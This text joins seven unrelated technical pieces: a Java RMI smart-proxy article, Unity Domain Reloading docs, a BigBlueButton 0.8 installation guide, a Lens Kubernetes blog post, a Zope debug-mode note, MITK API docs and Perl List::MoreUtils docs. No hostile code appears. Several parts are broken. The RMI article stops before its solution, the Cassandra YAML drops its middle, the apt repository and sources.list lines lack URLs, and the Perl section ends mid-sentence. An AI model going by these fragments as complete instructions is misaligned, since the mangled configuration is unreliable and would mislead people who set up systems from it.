Java Remote Method Invocation (RMI) gives clients access to objects in the server virtual machine (VM) in one of two ways: by reference or by value. To access a remote object by reference, the object must be an instance of a class that: - Implements an interface that extends java.rmi.Remote - Has a properly generated RMI stub class that implements the same interface - Is properly exported to allow incoming RMI calls. Smart proxies A smart proxy is a class, instantiated in the client VM, that holds onto a remote object reference. It implements the object's remote interface and typically forwards most of the calls on the interface to the remote object, just like an RMI stub. However, a smart proxy is more useful than the RMI stub in that you can change the behavior of the remote interface to do more than forward calls to the remote object. For instance, a smart proxy can locally cache state from the remote object to avoid the network overhead on every method call. CORBA implementations typically use a client-side object factory to instantiate smart proxies. The application calls a method of the factory to request a remote object reference. The factory gets the remote object reference, instantiates a smart proxy object that implements the same interface, and stores the remote reference in the proxy. The proxy is then returned to the caller. That approach works in pure Java applications as well. It has a few drawbacks, however. Client-side code typically has to know about the implementation of the server's objects, for instance, in order to know which attributes are safe to cache and which need to be read from the server each time. Another problem is that, as the server application changes, some remote objects that were good candidates for smart proxies might no longer be appropriate; other classes that didn't need a smart proxy on the client might now need one. Each of those changes requires changes on the client code that may already be distributed. 
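To make the client-side factory approach concrete, here is a minimal sketch in plain Java. The RMI plumbing is stubbed out so the example stays self-contained, and the Door, DoorStub, and factory names are illustrative, not the article's actual API: the factory looks up the remote reference, wraps it in a caching proxy, and hands the proxy back to the caller.

```java
interface Door {
    String getLocation();
    boolean isOpen();
}

// Stand-in for the RMI stub; a real stub would forward calls over the network.
class DoorStub implements Door {
    int remoteCalls = 0;
    public String getLocation() { remoteCalls++; return "front"; }
    public boolean isOpen() { remoteCalls++; return false; }
}

// Client-side smart proxy: caches the immutable location, forwards the rest.
class CachingDoorProxy implements Door {
    private final Door remote;
    private String cachedLocation;
    CachingDoorProxy(Door remote) { this.remote = remote; }
    public String getLocation() {
        if (cachedLocation == null) cachedLocation = remote.getLocation();
        return cachedLocation;   // later calls avoid the network round trip
    }
    public boolean isOpen() { return remote.isOpen(); } // volatile state: always forward
}

// Client-side factory: obtains the remote reference, wraps it in the proxy.
class DoorFactory {
    static Door getDoor(String location) {
        Door stub = new DoorStub();  // in real code: a naming-service lookup
        return new CachingDoorProxy(stub);
    }
}

public class FactoryDemo {
    public static void main(String[] args) {
        DoorStub stub = new DoorStub();
        Door door = new CachingDoorProxy(stub);
        door.getLocation();
        door.getLocation();            // second call served from the cache
        System.out.println("remote calls: " + stub.remoteCalls); // prints 1
        Door fromFactory = DoorFactory.getDoor("front");
        System.out.println(fromFactory.getLocation());           // prints front
    }
}
```

This is exactly the arrangement whose drawback the article describes: the factory, and therefore the knowledge of which attributes are safe to cache, lives in client code.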
A better solution would be to take advantage of RMI's ability to dynamically download classes that the client doesn't know about at runtime and implement the use of smart proxies in the server's code. That way, the client only knows that it is getting an object that implements the remote interface -- it doesn't know whether the object is a remote reference, a copy of a remote object, or a smart proxy. The server developer can, in fact, change the implementation from one of those to the other, and the client will continue to work without change. To implement smart proxies in the server, it helps to understand how RMI passes object references: - If the object returned from a remote method call implements an interface that extends java.rmi.Remote, the JVM believes that object should be a remote object and tries to construct an instance of the RMI stub for it. The stub is returned in place of the original object's reference. That is the pass-by-reference case as explained above; calls on the stub are forwarded to the server object. - Otherwise, if the object implements java.io.Serializable, the object itself is serialized and sent to the client VM, which then creates a copy of the object. (Primitive types, such as byte, char, boolean, int, and float, are always serialized and passed by value.) That is the pass-by-value case. - Finally, if neither of the above cases hold, an exception is thrown. When a serializable object is sent to the client VM, each of the object's non-transient fields goes through the same scrutiny. That is, if the field's type is a class that implements an interface that extends java.rmi.Remote (and it's not declared transient), an RMI stub is generated, sent to the client, and substituted for the field in the client's copy of the remote object. If the field is a reference to a serializable object, a copy of the field's data is serialized and sent to the client. In that case, the field in the client's VM will refer to that deserialized copy. 
That occurs recursively until all of the object graph's nontransient fields have been examined and sent appropriately. A smart proxy must, therefore, implement java.io.Serializable, while not implementing an interface that extends java.rmi.Remote. At the same time, the proxy must implement the same interface as the server object. That allows the client to use the proxy as if it was the server object. Achieving all three of those goals might appear a little tricky, however. How does the proxy implement the server object's interface and not implement java.rmi.Remote? The answer lies in refactoring the way remote objects are typically implemented.

Conventional remote objects
"Beg your pardon, sir, but your excuse, 'We've always done it this way,' is the most damaging phrase in the language."
-Rear Admiral Grace Hopper, Ret.

Suppose that you want remote access to a Door object that contains methods, which return the door location and detect if the door is open. To implement that in Java RMI, you need to define an interface that extends java.rmi.Remote. That interface would also declare the methods that comprise the object's remote interface. Likewise, you need to define a class that implements that interface and can be exported as a remote object. The easiest way to define that class is to extend java.rmi.server.UnicastRemoteObject. That leads to the design shown in the UML class diagram below. The remote interface, Door, extends java.rmi.Remote and declares the interface you need for Door objects. DoorImpl is the class that actually implements the Door interface. DoorImpl also extends java.rmi.server.UnicastRemoteObject so that instances of it can be accessed remotely. Below is the code that you could use to implement that design:

/**
 * Define the remote interface of a Door.
 * @author M. Jeff Wilson
 * @version 1.0
 */
public interface Door extends java.rmi.Remote {
    String getLocation() throws java.rmi.RemoteException;
    boolean isOpen() throws java.rmi.RemoteException;
}

/**
 * Define the remote object that implements the Door interface.
 * @author M. Jeff Wilson
 * @version 1.0
 */
public class DoorImpl extends java.rmi.server.UnicastRemoteObject implements Door {

    private final String name;
    private boolean open = false;

    public DoorImpl(String name) throws java.rmi.RemoteException {
        super();
        this.name = name;
    }

    // in this implementation, each Door's name is the same as its location.
    // we're also assuming the name will be unique.
    public String getLocation() {
        return name;
    }

    public boolean isOpen() {
        return open;
    }

    // assume the server side can call this method to set the
    // state of this door at any time
    void setOpen(boolean open) {
        this.open = open;
    }

    // convenience method for server code
    String getName() {
        return name;
    }

    // override various Object utility methods
    public String toString() {
        return "DoorImpl:[" + name + "]";
    }

    // DoorImpls are equivalent if they are in the same location
    public boolean equals(Object obj) {
        if (obj instanceof DoorImpl) {
            DoorImpl other = (DoorImpl)obj;
            return name.equals(other.name);
        }
        return false;
    }

    public int hashCode() {
        return toString().hashCode();
    }
}

Now that you've defined and implemented the Door interface, the next step is to allow remote clients to access Door's various instances. One way to do that is to bind each instance of DoorImpl to the RMI registry. The client would then have to construct a URL that contained the name of each Door it wanted, and do a naming service lookup on each Door to retrieve its RMI stub. That not only clutters up the RMI registry with a lot of names (one for each Door), but it is unnecessary work for the client as well. A better approach is to have one object bound in the RMI registry that keeps a collection of all the Doors in the server.
Clients can look up the name of that object in the registry, then make remote method calls on the object to retrieve specific Doors. The design of such a DoorServer is shown in Figure 2. Notice that DoorServer and DoorServerImpl look a lot like Door and DoorImpl, because you are defining another remote interface (DoorServer) and the class that implements it (DoorServerImpl). One difference is that DoorServerImpl hangs on to a collection of DoorImpl. It will use that collection to fulfill its public Door.getDoor(String location) method. Here's one possible implementation of the DoorServer design:

/**
 * We need a class to serve Door objects to clients.
 * First, create the server's remote interface.
 * @author M. Jeff Wilson
 * @version 1.0
 */
public interface DoorServer extends java.rmi.Remote {
    Door getDoor(String location) throws java.rmi.RemoteException;
}

/**
 * Define the class to implement the DoorServer interface.
 * @author M. Jeff Wilson
 * @version 1.0
 */
public class DoorServerImpl extends java.rmi.server.UnicastRemoteObject implements DoorServer {

    /**
     * Hashtable used to store instances of DoorImpl. The map will be keyed
     * by each DoorImpl's name attribute, so it is implied that two Doors
     * with the same name are equivalent.
     */
    private java.util.Hashtable hash = new java.util.Hashtable();

    public DoorServerImpl() throws java.rmi.RemoteException {
        // add a door to the hashtable
        DoorImpl impl = new DoorImpl("location1");
        hash.put(impl.getName(), impl);
    }

    /**
     * @param location - String value of the Door's location
     * @return an object that implements Door, given the location
     */
    public Door getDoor(String location) {
        return (Door)hash.get(location);
    }

    /**
     * Bootstrap the server by creating an instance of DoorServer and
     * binding its name in the RMI registry.
     */
    public static void main(String[] args) {
        System.setSecurityManager(new java.rmi.RMISecurityManager());
        // make the remote object available to clients
        try {
            DoorServerImpl server = new DoorServerImpl();
            java.rmi.Naming.rebind("rmi://host/DoorServer", server);
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(1);
        }
    }
}

Finally, to wrap things up, the client code that gets an instance of Door might look like this:

try {
    // get the DoorServer from the RMI registry
    DoorServer server = (DoorServer)Naming.lookup("rmi://host/DoorServer");

    // Use DoorServer to get a specific Door
    Door theDoor = server.getDoor("location1");

    // invoke methods on the returned Door
    if (theDoor.isOpen()) {
        // handle the door-open case
        ...
    }
} catch (Exception e) {
    e.printStackTrace();
}

In that implementation, the client has to find the DoorServer by asking the RMI registry for it (via the call to Naming.lookup(URL)). Once the DoorServer is found, the client can ask for specific Door instances by calling DoorServer.getDoor(String), passing the Door's location.
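The excerpt stops before showing the server-side smart proxy itself, but following the rules stated above — implement Serializable, implement Door, and do not extend Remote — one possible sketch looks like this. The RMI machinery is stubbed out here so the example stays self-contained, and DoorProxy is an illustrative name, not the article's definitive implementation:

```java
import java.io.Serializable;

// Simplified Door interface (the real one would throw RemoteException).
interface Door {
    String getLocation();
    boolean isOpen();
}

// Stand-in for the RMI stub of DoorImpl.
class DoorStub implements Door {
    public String getLocation() { return "location1"; }
    public boolean isOpen() { return true; }
}

/**
 * Serializable smart proxy. Because it implements Serializable (not Remote),
 * RMI passes it by value; in real RMI the 'remote' field would be replaced by
 * an RMI stub during serialization, so the client transparently receives the
 * proxy plus a stub for the server object.
 */
class DoorProxy implements Door, Serializable {
    private final Door remote;      // would serialize as an RMI stub
    private final String location;  // immutable state cached locally

    DoorProxy(Door remote, String location) {
        this.remote = remote;
        this.location = location;
    }

    public String getLocation() {
        return location;            // no network call needed
    }

    public boolean isOpen() {
        return remote.isOpen();     // volatile state: forward to the server
    }
}

public class ProxyDemo {
    public static void main(String[] args) {
        Door door = new DoorProxy(new DoorStub(), "location1");
        System.out.println(door.getLocation()); // served from the local cache
        System.out.println(door.isOpen());      // forwarded to the "server"
    }
}
```

Under this arrangement, DoorServerImpl.getDoor() could return new DoorProxy(doorImpl, doorImpl.getName()) instead of the DoorImpl itself, and the client code shown above would not need to change.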
Domain Reloading resets your scripting state, and is enabled by default. It provides you with a completely fresh scripting state, and resets all static fields and registered handlers each time you enter Play Mode. This means each time you enter Play Mode in the Unity Editor, your Project begins playing in a very similar way to when it first starts up in a build.

Domain Reloading takes time, and this time increases with the number and complexity of the scripts in your Project. When it takes a long time to enter Play Mode, it becomes harder to rapidly iterate on your Project. This is the reason Unity provides the option to turn off Domain Reloading. When Domain Reloading is disabled, entering Play Mode is faster, because Unity does not reset the scripting state each time. However, it is then up to you to ensure your scripting state resets when you enter Play Mode. To do this, you need to add code that resets your scripting state when Play Mode starts. When Domain Reloading is disabled, Unity still refreshes the scripting state when you update or re-import a script, based on your auto-refresh settings.

To ensure your scripting state correctly resets when entering Play Mode, you need to make adjustments to static fields and static event handlers in your scripts. When Domain Reloading is disabled, the values of static fields in your code do not automatically reset to their original values. You need to add code that explicitly does this. The following code example has a static counter field which increments when the user presses the Jump button. When Domain Reloading is enabled, the counter automatically resets to zero when entering Play Mode. When Domain Reloading is disabled, the counter does not reset; it keeps its value in and out of Play Mode. This means that on a second run of your Project in the Editor, the counter might not be at zero if it changed in the previous run.
using UnityEngine;

public class StaticCounterExample : MonoBehaviour
{
    // this counter will not reset to zero when Domain Reloading is disabled
    static int counter = 0;

    // Update is called once per frame
    void Update()
    {
        if (Input.GetButtonDown("Jump"))
        {
            counter++;
            Debug.Log("Counter: " + counter);
        }
    }
}

To make sure the counter resets even when Domain Reloading is disabled, you must use the [RuntimeInitializeOnLoadMethod(RuntimeInitializeLoadType.SubsystemRegistration)] attribute, and reset the value explicitly:

using UnityEngine;

public class StaticCounterExampleFixed : MonoBehaviour
{
    static int counter = 0;

    [RuntimeInitializeOnLoadMethod(RuntimeInitializeLoadType.SubsystemRegistration)]
    static void Init()
    {
        Debug.Log("Counter reset.");
        counter = 0;
    }

    // Update is called once per frame
    void Update()
    {
        if (Input.GetButtonDown("Jump"))
        {
            counter++;
            Debug.Log("Counter: " + counter);
        }
    }
}

With Domain Reloading disabled, Unity does not automatically unregister methods from static event handlers, which can cause those methods to be called twice when the event occurs. For example, this code registers a method with the static event handler Application.quitting. With Domain Reloading enabled, Unity automatically resets the event handler when Play Mode starts, so the method is only ever registered once. However, with Domain Reloading disabled, the event handler is not cleared, so on the second run of your Project in the editor, the method is registered a second time, and is called twice when the event occurs - which is usually undesirable.

using UnityEngine;

public class StaticEventExample : MonoBehaviour
{
    void Start()
    {
        Debug.Log("Registering quit function");
        Application.quitting += Quit;
    }

    static void Quit()
    {
        Debug.Log("Quitting!");
    }
}

When Domain Reloading is disabled, the above example adds the Quit method again each time you enter Play Mode. This results in an additional "Quitting" message each time you exit Play Mode.
To ensure the event handler resets even when Domain Reloading is disabled, you must use the [RuntimeInitializeOnLoadMethod] attribute, and unregister the method explicitly so that it is not added twice.

using UnityEngine;

public class StaticEventExampleFixed : MonoBehaviour
{
    [RuntimeInitializeOnLoadMethod]
    static void RunOnStart()
    {
        Debug.Log("Unregistering quit function");
        Application.quitting -= Quit;
    }

    void Start()
    {
        Debug.Log("Registering quit function");
        Application.quitting += Quit;
    }

    static void Quit()
    {
        Debug.Log("Quitting the Player");
    }
}

For runtime scripts, you must use the [RuntimeInitializeOnLoadMethod(RuntimeInitializeLoadType.SubsystemRegistration)] attribute to reset static fields and event handlers. For Editor scripts such as custom Editor windows or Inspectors that use statics, you must use the [InitializeOnEnterPlayMode] attribute to reset static fields and event handlers.
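The page does not include an Editor-side example, so here is a hypothetical sketch (the class and field names are invented for illustration; [InitializeOnEnterPlayMode] lives in the UnityEditor namespace) of resetting a static used by a custom Editor window:

```csharp
using UnityEditor;
using UnityEngine;

public static class EditorCounterExample
{
    // hypothetical static state used by a custom Editor window
    static int selectionCount = 0;

    [InitializeOnEnterPlayMode]
    static void ResetOnEnterPlayMode()
    {
        Debug.Log("Resetting Editor-side static state.");
        selectionCount = 0;
    }
}
```

Like the runtime variants above, this runs each time you enter Play Mode, so the Editor-side state starts from a known value even with Domain Reloading disabled.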
We're pleased to announce the release of BigBlueButton 0.8-RC2. Our goal since the beginning of this release has been to integrate record and playback into BigBlueButton's core. This release is the culmination of months of effort (our last release was January 14, 2010). With this release, you can now record and play back slides, audio, and chat within BigBlueButton. This enables BigBlueButton to address a much wider set of use cases for distance education. For a detailed list of changes, see the 0.8-RC2 release notes. If you have any problems not answered by this document, or you have questions/feedback, please post to bigbluebutton-setup. If you encounter a bug when using BigBlueButton, please report it so we can continue to improve BigBlueButton for the benefit of all.

These instructions require you to install BigBlueButton 0.8 on an Ubuntu 10.04 32-bit or 64-bit server (or desktop). We've not tested the installation on earlier or later versions of Ubuntu. We recommend installing BigBlueButton on a dedicated (non-virtual) server for optimal performance. To install BigBlueButton, you'll need root access to an Ubuntu 10.04 server.

Currently, as of BigBlueButton 0.8-RC2, the locale of the server must be en_US.UTF-8. You can verify this by:

$ cat /etc/default/locale
LANG="en_US.UTF-8"

If you are upgrading from BigBlueButton 0.71a, start here. If you are upgrading from an earlier BigBlueButton 0.8 beta, do the following:

sudo apt-get update
sudo apt-get dist-upgrade

If you've made custom changes to BigBlueButton, you'll need to back up your changes before doing the following upgrade, after which you can reapply them. At some point in the process you may be asked whether to update configuration files. Enter 'Y' each time to continue the upgrade.
After BigBlueButton updates, restart all the processes. After the install finishes, restart your BigBlueButton server with:

sudo bbb-conf --clean
sudo bbb-conf --check

To make it easy for you to set up your own BigBlueButton 0.8 server, we've put together the following overview video. We recommend you follow the video along with the step-by-step instructions below. You first need to give your server access to the BigBlueButton package repository for 0.8. (If a gem installation fails, you can resolve this by manually installing the gems; see the troubleshooting section below.)

To interactively test your BigBlueButton server, install the API demos. Later on, if you wish to remove the API demos, you can enter the command:

sudo apt-get purge bbb-demo

To ensure BigBlueButton has started cleanly, enter the following commands:

sudo bbb-conf --clean
sudo bbb-conf --check

The output from sudo bbb-conf --check will display your current settings and, after the text "Potential problems described below", print any potential configuration or startup problems it has detected. Go to Trying out your server.

The following steps will upgrade a standard installation of BigBlueButton 0.71a to 0.8. A 'standard installation' is an installation of BigBlueButton 0.71a that has been configured using the standard commands:

sudo bbb-conf --setip <ip/hostname>
sudo bbb-conf --setsalt <salt>

If you've made custom changes to BigBlueButton 0.71a, back them up first. First, let's update all the current packages on your server (including the kernel) to ensure you're starting with an up-to-date system:

sudo apt-get update
sudo apt-get dist-upgrade

Follow the instructions here. This step will uninstall FreeSWITCH 1.0.6. BigBlueButton 0.8 requires FreeSWITCH 1.0.7 for recording of sessions. In later steps, BigBlueButton 0.8 will install and configure FreeSWITCH 1.0.7. Before upgrading, first remove the older FreeSWITCH packages.
sudo apt-get purge freeswitch freeswitch-sounds-en-us-callie-16000 freeswitch-sounds-en-us-callie-8000 freeswitch-sounds-music-16000

Check to ensure that there are no remaining FreeSWITCH packages:

dpkg -l | grep freesw

If there are any remaining packages, such as freeswitch-lang-en, then purge those as well.

First, update the BigBlueButton repository URL to the beta repository:

echo "deb bigbluebutton-lucid main" | sudo tee /etc/apt/sources.list.d/bigbluebutton.list

Next, update the local packages. This will make apt-get aware of the newer packages for BigBlueButton 0.8:

sudo apt-get update

The following command will upgrade your packages to the latest beta:

sudo apt-get dist-upgrade

After a few moments you'll be prompted whether you want to overwrite /etc/nginx/sites-available/bigbluebutton. Type 'y' and hit Enter.

Now let's install and configure FreeSWITCH 1.0.7:

sudo apt-get install bbb-freeswitch-config

Install the API demos to interactively try BigBlueButton:

sudo apt-get install bbb-demo

We no longer need activemq, so let's remove it. The command sudo apt-get autoremove will remove all remaining packages that have no reference:

sudo apt-get purge activemq
sudo apt-get autoremove

Let's do the standard clean restart and then check the system for any potential problems:

sudo bbb-conf --clean
sudo bbb-conf --check

You've got a full BigBlueButton server up and running (don't you just love the power of Ubuntu/Debian packages). Open a web browser to the URL of your server. You should see the BigBlueButton welcome screen. To start using your BigBlueButton server, enter your name and click the 'Join' button. You'll join the Demo Meeting. If this is your first time using BigBlueButton, take a moment and watch these overview videos. To record a session, click 'API Demos' on the welcome page and choose 'Record'. Start a meeting and upload slides. When you are done, click 'Logout' and return to the 'API Demos' and the record demo.
Wait a few moments and refresh your browser; you should see your recording appear. Click 'Slides' to play back the slides, audio, and chat of the recording. The following YouTube video will walk you through using record and playback. If you want to use BigBlueButton with a 3rd party integration, you can get the URL and security salt from your server using the command bbb-conf --salt:

$ bbb-conf --salt
URL:
Salt: b22e37979cf3587dd616fa0a4e6228

We hope you enjoy using BigBlueButton and welcome your feedback! If you don't find an answer to your questions below, check out our Frequently Asked Questions. A common question is: How do I set up multiple virtual classrooms?

We've built a BigBlueButton configuration utility, called bbb-conf, to help you configure your BigBlueButton server and troubleshoot. For example, here's the output on one of our internal servers. If you see text after the line ** Potential problems described below **, then bbb-conf detected something wrong with your setup.

For some VPS installations of Ubuntu 10.04, the hosting provider does not give a full /etc/apt/sources.list. If you find you are unable to install a package, try replacing your /etc/apt/sources.list with the following:

# deb cdrom:[Ubuntu-Server 10.04 LTS _Lucid Lynx_ - Release amd64 (20100427)]/ lucid main restricted
# deb cdrom:[Ubuntu-Server 10.04 LTS _Lucid Lynx_ - Release amd64 (20100427)]/

then do sudo apt-get update and try installing BigBlueButton again.

A common problem is that the default install scripts for BigBlueButton configure it to listen on an IP address, so if you are accessing your server via a DNS hostname, you'll see the 'Welcome to nginx' message. To change all of BigBlueButton's configuration files to use a different IP address or hostname, enter:

sudo bbb-conf --setip <ip_address_or_hostname>

For more information see bbb-conf options.
If you have apache2 already running on the server, you'll likely see the following error message from nginx when it starts:

Restarting nginx: [emerg]: bind() to 0.0.0.0:80 failed (98: Address already in use)

If you see this error, it means that nginx is unable to bind to port 80 on the local server. To find out what's binding to port 80, do the following:

sudo apt-get install lsof
lsof -i :80

If you see apache2 listed, then stop apache2 and start nginx:

sudo /etc/init.d/apache2 stop
sudo /etc/init.d/nginx start

The install script for bbb-record-core needs to install a number of ruby gems. However, if you are behind an HTTP proxy, the install script for bbb-record-core will likely exit with an error. This occurs because the bash environment for bbb-record-core will not have a value for HTTP_PROXY. You can resolve this by manually installing the gems using the following script:

#!/bin/bash
export HTTP_PROXY="<your_http_proxy>"
gem install --http-proxy $HTTP_PROXY builder -v 2.1.2
gem install --http-proxy $HTTP_PROXY diff-lcs -v 1.1.2
gem install --http-proxy $HTTP_PROXY json -v 1.4.6
gem install --http-proxy $HTTP_PROXY term-ansicolor -v 1.0.5
gem install --http-proxy $HTTP_PROXY gherkin -v 2.2.9
gem install --http-proxy $HTTP_PROXY cucumber -v 0.9.2
gem install --http-proxy $HTTP_PROXY curb -v 0.7.15
gem install --http-proxy $HTTP_PROXY mime-types -v 1.16
gem install --http-proxy $HTTP_PROXY nokogiri -v 1.4.4
gem install --http-proxy $HTTP_PROXY rack -v 1.2.2
gem install --http-proxy $HTTP_PROXY redis -v 2.1.1
gem install --http-proxy $HTTP_PROXY redis-namespace -v 0.10.0
gem install --http-proxy $HTTP_PROXY tilt -v 1.2.2
gem install --http-proxy $HTTP_PROXY sinatra -v 1.2.1
gem install --http-proxy $HTTP_PROXY vegas -v 0.1.8
gem install --http-proxy $HTTP_PROXY resque -v 1.15.0
gem install --http-proxy $HTTP_PROXY rspec-core -v 2.0.0
gem install --http-proxy $HTTP_PROXY rspec-expectations -v 2.0.0
gem install --http-proxy $HTTP_PROXY rspec-mocks -v 2.0.0
gem install --http-proxy $HTTP_PROXY rspec -v 2.0.0
gem install --http-proxy $HTTP_PROXY rubyzip -v 0.9.4
gem install --http-proxy $HTTP_PROXY streamio-ffmpeg -v 0.7.8
gem install --http-proxy $HTTP_PROXY trollop -v 1.16.2

Once all the gems are installed, you can restart the installation process with the command:

sudo apt-get install -f
http://code.google.com/p/bigbluebutton/wiki/08InstallationUbuntu
Numerous reports have consistently shown that enterprises today embrace hybrid and multicloud as their preferred modes of IT infrastructure deployment. According to a survey done by IDG, more than half (55%) of organizations currently use multiple public clouds, with 21% saying they use three or more. As developers become acclimated to building and shipping containers, Kubernetes has clearly become the go-to choice for container orchestration. There are numerous reasons why an organization would deploy Kubernetes across multiple cloud vendors: Cloud bursting In a multicloud infrastructure, “bursting” involves using resources from one cloud to supplement the resources of another. If an organization using a private cloud reaches 100 percent of its resource capacity, the overflow traffic is directed to a public cloud to avoid any interruption of services. Disaster recovery and backup In practice, you do not want one cloud provider to be the single point of failure. By spreading recovery resources across clouds, you achieve greater resilience and availability than in a single cloud infrastructure. With all of that infrastructure in place, it is very challenging for IT operations teams to manage multiple clusters. The following challenges arise: - To access the clusters, a large number of kubeconfig files needs to be maintained. One has to context-switch between them for different clusters and projects, and the added complexity of differences in access methods across cloud providers can be cumbersome. - While developers typically focus on writing code, today it is not uncommon for them to learn the operations side of applications. While Kubernetes is designed to help them ship and update applications much faster, it is complex in itself. They need to get up to speed with its concepts quickly so that they can focus on what matters: the application code. - Troubleshooting in Kubernetes is not a trivial task.
During the course of a debugging session, the admin has to identify errors from pod logs and events, pod status, and so on. A new admin could easily spend a lot of valuable time figuring out the correct commands and logs to check, adversely impacting the business. Kubernetes exposes a standard dashboard that provides an overview of applications running on your cluster, but this works only at the individual cluster level. A unified management solution that addresses the challenges above is needed. We will focus on the open-source solution Lens today. Lens is a standalone application that is available on macOS, Windows, and Linux, which means you don't have to install any packages on the Kubernetes nodes themselves. The single IDE can be used to manage all your clusters on any platform just by importing the kubeconfig file. Let's jump in and take a look. Installing Lens Navigate to the Lens webpage, download and install it for your preferred OS. Immediately after opening the application, hit the ‘+’ button to add your cluster. You can either import the kubeconfig file or paste it, and voila! Let the magic begin. I have deployed two clusters, one with Karbon (Nutanix's Kubernetes management solution) on Nutanix private cloud, and the second one using Azure Kubernetes Service. Importing the kubeconfig file for the AKS cluster is shown below. In the cluster overview, you can see all available cluster resources via a single pane of glass. You can view all your workloads, their current state, and any related events, and even filter them by namespace. Clicking on any resource will pull up all the details about it, basically the same as you would see from the output of: kubectl get <daemonset|pod|deployment> -n <namespace> <name> -o yaml Deploying an application Here, I've added the Karbon cluster as well in Lens. Let's go ahead and deploy a Cassandra StatefulSet onto this cluster.
The YAML I used is below: apiVersion: v1 kind: Service metadata: labels: app: cassandra name: cassandra spec: clusterIP: None ports: - port: 9042 selector: app: cassandra --- volumeMounts: - name: cassandra-data mountPath: /cassandra_data volumeClaimTemplates: - metadata: name: cassandra-data spec: accessModes: [ "ReadWriteOnce" ] storageClassName: default-storageclass resources: requests: storage: 1Gi Right after applying it, you can see the StatefulSet, services, pods, and other resources being created via Lens. You can check out the live logs being updated for the Pods which is invaluable for troubleshooting. All of the events are recorded on the same page as well, which is the output of what you would see from: kubectl describe pod cassandra-0 These are definitely great tools that would save you a lot of hassle and time during deployments. Furthermore, you could drop into the shell inside the pod as well on the same page. We verify that all the three nodes of the Cassandra cluster are running, as is shown in the screenshot below. If you are still not impressed, Lens does give you the option to create, update, and delete resources right from its GUI as well as from the in-built terminal, which is automatically switched to the right context. Let’s go ahead and deploy a ReplicaSet to bring up three nginx pods. This will be deployed in the “nginx” namespace which was again created from Lens. RBAC Authorization Kubernetes RBAC is supported, which means individual users connecting to Kubernetes clusters via Lens can only interact with the resources they are allowed to. In the image below, you can see a domain user [email protected] has imported his kubeconfig file but he doesn’t have the authority to list any pods. The cluster admin deploys the following YAML file, creating the Role sre-role and a RoleBinding sre-role-binding for this user [email protected]. 
apiVersion: v1 kind: Namespace metadata: name: sre --- apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: namespace: sre name: sre-role rules: - apiGroups: ["", "apps", "batch", "extensions"] resources: ["services", "endpoints", "pods", "deployments"] verbs: ["get", "list", "watch"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: namespace: sre name: sre-role-binding subjects: - kind: User name: [email protected] apiGroup: rbac.authorization.k8s.io roleRef: kind: Role name: sre-role apiGroup: rbac.authorization.k8s.io Following this, we see the user is authorized to perform the same action as seen below. Conclusion Kubernetes is a complex platform with a rapidly-expanding set of capabilities. Users are best served by tools and technologies that simplify Kubernetes management across the lifecycle. Lens, with its rich set of features and dashboard, offers Kubernetes admins an effective means of simplifying multicloud management. It requires minimal learning, offers easy context switching between multiple Kubernetes clusters, real-time cluster state visualization, and even enforcement of RBAC security using the standard Kubernetes API. Lens can significantly improve productivity, and it is an excellent choice to administer your Kubernetes clusters in a multicloud configuration! Guest post by Nimal Kunnath, Systems Reliability Engineer at Nutanix
https://aster.cloud/2021/01/07/multicloud-kubernetes-management-with-lens/
Imagine if you, in your code, want to find out if Zope is running in debug mode or not, then how do you do that? Here's my take on it that I learned today: from Globals import DevelopmentMode class MyProduct(Folder): def save(self, file): if DevelopmentMode: print "Saving the file now" self._save(file) The example doesn't do much justice because your product code should perhaps use its own "debug mode parameter" to get greater control. I needed this because instead of using the Auto refresh feature inside the ZMI I have a script that periodically checks for changes and does a manual refresh. When you're not in debug mode, a change to a .dtml or .zpt requires a refresh, whereas when you're in debug mode it doesn't need refreshing to see the changes. I'll try to find some time later this month to write about and share my refresh script, which is something that I now can't live without when doing Zope development.
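As a hedged sketch of the "own debug mode parameter" idea above: the wrapper names (DEBUG, log_debug) are invented for this example, only the Globals import is real Zope, and the code is written in modern Python syntax rather than the Python 2 of the original post.

```python
# Sketch of a product-level debug flag built on Zope's DevelopmentMode.
# DEBUG and log_debug are invented names, not part of Zope itself.
try:
    from Globals import DevelopmentMode  # available when running inside Zope
except ImportError:
    DevelopmentMode = False  # sensible default outside a Zope process

DEBUG = bool(DevelopmentMode)

def log_debug(message):
    """Print a message only when the server runs in debug mode."""
    if DEBUG:
        print(message)

log_debug("Saving the file now")  # silent unless Zope runs in debug mode
```

Keeping the check behind your own flag means call sites never import Globals directly, so you could later switch the flag to a product configuration option without touching them.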
http://www.peterbe.com/plog/zope-in-developmentmode
#include <mitkLabeledImageLookupTable.h> A lookup table for 2D mapping of labeled images. The lookup table supports images with up to 256 unsigned labels. Negative labels are not supported. Please use the level/window settings as given by the GetLevelWindow() method to make sure that the colors are rendered correctly. The colors are initialized with random colors as default. Label 0 is assumed to be the background. The color for the background is set to fully transparent as default. Definition at line 33 of file mitkLabeledImageLookupTable.h. The data type for a label. Currently only images with labels in the range [0,255] are supported. Definition at line 45 of file mitkLabeledImageLookupTable.h. Default constructor. Protected to prevent "normal" creation. Virtual destructor. Generates a random rgb color value. Values for rgb are in the range [0,1]. Generates a random number drawn from a uniform distribution in the range [0,1]. Determines the color which will be used for coloring a given label. Provides access to level window settings, which should be used in combination with the LUTs generated by this filter (at least for 2D visualization). If you use other level/window settings, it is not guaranteed that scalar values are mapped to the correct colors. Definition at line 80 of file mitkLabeledImageLookupTable.h. Standard mitk typedefs are generated by the mitkClassMacro. Make this object constructable by the ::New() method. Implementation necessary because the operator is made private in itk::Object. Reimplemented from mitk::LookupTable. Sets the color for a given label. Definition at line 105 of file mitkLabeledImageLookupTable.h.
https://docs.mitk.org/nightly/classmitk_1_1LabeledImageLookupTable.html
List::MoreUtils provides some trivial but commonly needed functionality on lists which is not going to go into List::Util. All of the below functions are implementable in only a couple of lines of Perl code. Using the functions from this module however should give slightly better performance as everything is implemented in C. The pure-Perl implementation of these functions only serves as a fallback in case the C portions of this module couldn't be compiled on this machine. first_value is an alias for firstval. Returns the last value in LIST for which BLOCK evaluates to true. Each element of LIST is set to $_ in turn. Returns undef if no such element has been found. last_value is an alias for lastval. Nothing is exported by default. To import all of this module's symbols, do the conventional use List::MoreUtils ':all'; It may make more sense though to only import the stuff your program actually needs: use List::MoreUtils qw{ any firstidx }; When LIST_MOREUTILS_PP is set, the module will always use the pure-Perl implementation and not the XS one. This environment variable is really just there for the test-suite to force testing the Perl implementation, and possibly for reporting of bugs. I don't see any reason to use it in a production environment. There is a problem with a bug in 5.6.x perls. It is a syntax error to write things like: my @x = apply { s/foo/bar/ } qw{ foo bar 